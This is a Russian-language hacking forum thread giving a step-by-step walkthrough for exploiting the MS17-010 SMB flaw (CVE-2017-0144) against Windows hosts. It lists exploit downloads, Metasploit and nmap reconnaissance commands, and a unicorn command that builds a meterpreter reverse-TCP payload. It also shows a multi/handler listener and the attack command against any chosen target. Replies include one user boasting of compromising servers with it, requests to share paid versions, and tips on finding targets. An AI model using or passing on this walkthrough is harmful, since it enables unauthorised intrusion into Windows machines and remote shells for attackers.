Статья CVE-2017-0144 |MS17-010

Всем привет, сегодня я вам покажу как эксплуатировать CVE-2017-0144 начнем.
Качаем это:

https://www.exploit-db.com/exploits/42315/

и это :

https://github.com/worawit/MS17-010/blob/master/mysmb.py

и вот это:

https://github.com/trustedsec/unicorn

Кидаем все в одну папку и создаем файл:

touch _init_.py

Следующим шагом заходим в metasploit.
Пишем :

use auxiliary/scanner/smb/pipe_auditor
set rhosts <ваша цель>
run

Должно появиться это:

IMG

Теперь пишем:

nmap -A -p 445 <ваша цель>

Нас интересует это:

IMG

Далее пишем:

gedit <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/>

Там, где USERNAME, пишем что получили в nmap(guest)
Ищем этот фрагмент кода:

IMG

Убираем комментарий с этой строчки:

IMG

Приводим строчку в такой вид:

IMG

Теперь создадим нагрузку:

python unicorn.py windows/meterpreter/reverse_tcp <ваш ip> <порт>

Открываем файл powershell_attack.txt копируем содержимое и вставляем сюда:

IMG

Удалим кавычку в конце:

IMG

Сохраняем файл.
Выставляем прослушку в metasploit :

use exploit multi/handler
set lport <port>
set lhost <ваш ip>
set payload  windows/meterpreter/reverse_tcp
exploit

Эксплуатируем:

python <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/> <ip цели> <pipe>(например netlogon)

Выполняем команду до тех пор пока не появиться это:

IMG

Нам прилетает сессия)

IMG

Протестировано на:

- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86

 

[skill]

Просто прежде чем писть разбери подробно а не поверхностно

 

[Tayrus]

Просто прежде чем писть разбери подробно а не поверхностно

Тогда расскажи, что это?)

 

[skill]

В соседней теме уде все разжевано посмотри

 

[Tayrus]

В соседней теме уде все разжевано посмотри

В какой именно?

 

[skill]

EternalBlue - Эксплуатация Windows PC

 

[Tayrus]

EternalBlue - Эксплуатация Windows PC

Это другое.

 

[skill]

Хорошо чем отличается? И из 9 страниц нет того что ты описал? Ладно пусть будет уникальной

 

[woolf1514]

Псс... Таргеты если что можно найти с помощью Eternal Scanner

 

[Ondrik8]

уязвимость до сих пор актуальна! в бою проверял иногда выручает! и кстати ее постоянно усовершенствуют и продают к счастью я являюсь счастливым обладателем сего софта)
и скажу что дедики сшибает на раз-два

 

[Elektrolife]

уязвимость до сих пор актуальна! в бою проверял иногда выручает! и кстати ее постоянно усовершенствуют и продают к счастью я являюсь счастливым обладателем сего софта)
и скажу что дедики сшибает на раз-два

Поделитесь с собратьями по оружию ?

 

[Changer431]

Качаем это:

https://www.exploit-db.com/exploits/42315/

и это :

https://github.com/worawit/MS17-010/blob/master/mysmb.py

и вот это:

https://github.com/trustedsec/unicorn

[/CODE]

а как его скачать? там нету даже ссылки

 

[Tayrus]

а как его скачать? там нету даже ссылки

C explot-db этот пункт: Exploit:

Ссылка скрыта от гостей

/

Ссылка скрыта от гостей

С github.com git clone <что вам надо>
Скрипт с github кнопочка RAW> Сохранить

 

[The ROOT]

По данному методу возникла ошибка, что я не так сделал?

Как понимаю не может импортировать файл MYSMB. Откуда его взять и куда положить нужно?

 

[Tayrus]

По данному методу возникла ошибка, что я не так сделал?
Посмотреть вложение 19456
Как понимаю не может импортировать файл MYSMB. Откуда его взять и куда положить нужно?

Ссылка скрыта от гостей

В статье все описано.

 

[The ROOT]

Ссылка скрыта от гостей

В статье все описано.

Ну не совсем же я отбитый, все файлы у меня есть, делаю по мануалу, но ошибка как на скрине выше, если редактирую mysmb.py как написано тут TypeError on mysmb.py. · Issue #13 · worawit/MS17-010
То тоже всё печально

 

[ReQ]

Тоесть это работает только в локальной сети?

 

[pr0phet]

Тоесть это работает только в локальной сети?

Это работает где угодно, был бы доступен 445 порт.

 

[Positive Nickname]

Очень интересно, спасибо.
Возник вопрос к пункту где nmap'ом тащишь юзера. Предположим на целевой машине при скане 445 порта выдало вместо "guest" и тд "<blank>". Меняет ли как то это алгоритм эксплуатации, или в данном случае статья не актуальна?
Целевой хост Windows 2016

 

[IKUS]

.... ищу софтину для сканера 445 порта с указанием диапазона адреса

 

[MrBa]

То тоже всё печально

Такая же беда. Может кто из гуру что посоветует? Или уже не актуально?